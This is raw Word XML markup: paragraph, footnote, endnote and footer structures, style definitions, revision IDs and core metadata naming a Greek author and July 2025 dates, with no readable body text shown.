    <w:p w14:paraId="7EF1ECFF" w14:textId="5A1A5A39" w:rsidR="00CC1E57" w:rsidRPr="00CC1E57" w:rsidRDefault="00CC1E57" w:rsidP="00CC1E57">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1E57">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="400426BB" wp14:editId="62156D7B">
            <wp:extent cx="5274310" cy="800735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="884750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020" name="Picture 1" descr="A black background with white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E57" w:rsidRPr="00CC1E57">
      <w:footerReference w:type="default" r:id="rId3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F0570" w14:textId="77777777" w:rsidR="000F750A" w:rsidRDefault="000F750A" w:rsidP="00A16F3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="18C1FC20" w14:textId="77777777" w:rsidR="000F750A" w:rsidRDefault="000F750A" w:rsidP="00A1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5891593"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="62595E01" w14:textId="324FDFB3" w:rsidR="00A16F3C" w:rsidRDefault="00A16F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05B2318" w14:textId="77777777" w:rsidR="00A16F3C" w:rsidRDefault="00A1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71105" w14:textId="77777777" w:rsidR="000F750A" w:rsidRDefault="000F750A" w:rsidP="00A16F3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0314D2D8" w14:textId="77777777" w:rsidR="000F750A" w:rsidRDefault="000F750A" w:rsidP="00A16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0"/>
    <w:rsid w:val="00025A1E"/>
    <w:rsid w:val="00086989"/>
    <w:rsid w:val="00095959"/>
    <w:rsid w:val="000F750A"/>
    <w:rsid w:val="00132EF1"/>
    <w:rsid w:val="0018145A"/>
    <w:rsid w:val="001C5997"/>
    <w:rsid w:val="00221125"/>
    <w:rsid w:val="00277289"/>
    <w:rsid w:val="00291DF3"/>
    <w:rsid w:val="002A437D"/>
    <w:rsid w:val="002B2713"/>
    <w:rsid w:val="002D099B"/>
    <w:rsid w:val="002E1E37"/>
    <w:rsid w:val="002F7D37"/>
    <w:rsid w:val="003208DB"/>
    <w:rsid w:val="00361DEA"/>
    <w:rsid w:val="003651A1"/>
    <w:rsid w:val="003B42FC"/>
    <w:rsid w:val="003C0D73"/>
    <w:rsid w:val="00417142"/>
    <w:rsid w:val="004175C0"/>
    <w:rsid w:val="00420F0D"/>
    <w:rsid w:val="0042502E"/>
    <w:rsid w:val="00490371"/>
    <w:rsid w:val="00492779"/>
    <w:rsid w:val="004C0618"/>
    <w:rsid w:val="0054022A"/>
    <w:rsid w:val="00544317"/>
    <w:rsid w:val="005838A0"/>
    <w:rsid w:val="00595F42"/>
    <w:rsid w:val="005B371C"/>
    <w:rsid w:val="005B7359"/>
    <w:rsid w:val="00634119"/>
    <w:rsid w:val="0065392B"/>
    <w:rsid w:val="0069368D"/>
    <w:rsid w:val="0069590F"/>
    <w:rsid w:val="0071588B"/>
    <w:rsid w:val="007205E6"/>
    <w:rsid w:val="007D77C4"/>
    <w:rsid w:val="007E13A5"/>
    <w:rsid w:val="0084646D"/>
    <w:rsid w:val="008C03D5"/>
    <w:rsid w:val="008C41E7"/>
    <w:rsid w:val="009166C5"/>
    <w:rsid w:val="00960686"/>
    <w:rsid w:val="00977B52"/>
    <w:rsid w:val="009A53A7"/>
    <w:rsid w:val="00A14B8B"/>
    <w:rsid w:val="00A16F3C"/>
    <w:rsid w:val="00A513EE"/>
    <w:rsid w:val="00A52886"/>
    <w:rsid w:val="00A81F26"/>
    <w:rsid w:val="00A96003"/>
    <w:rsid w:val="00AE657E"/>
    <w:rsid w:val="00B07505"/>
    <w:rsid w:val="00B32B09"/>
    <w:rsid w:val="00BB4E17"/>
    <w:rsid w:val="00BC5416"/>
    <w:rsid w:val="00BF377F"/>
    <w:rsid w:val="00C05876"/>
    <w:rsid w:val="00C8340C"/>
    <w:rsid w:val="00CC1E57"/>
    <w:rsid w:val="00CD0C20"/>
    <w:rsid w:val="00CD1B19"/>
    <w:rsid w:val="00CF6BFF"/>
    <w:rsid w:val="00D12FD7"/>
    <w:rsid w:val="00D227D7"/>
    <w:rsid w:val="00DE3BFE"/>
    <w:rsid w:val="00E20286"/>
    <w:rsid w:val="00E3169D"/>
    <w:rsid w:val="00ED207C"/>
    <w:rsid w:val="00F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A45"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{80029E5E-6926-4EEC-97EB-1C316B3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8D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0058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A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437D"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="el-G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1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4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145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3C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A16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3C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E20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l-GR"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009166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l-G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6C5"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="2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801332-BF0E-4AA4-82CD-0D153D8A754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40</Pages>
  <Words>9228</Words>
  <Characters>49837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ΙΩΑΝΝΗΣ</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ΑΛΕΞΟΠΟΥΛΟΣ ΙΩΑΝΝΗΣ</cp:lastModifiedBy>
  <cp:revision>62</cp:revision>
  <cp:lastPrinted>2025-07-13T15:26:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-12T14:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-13T15:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>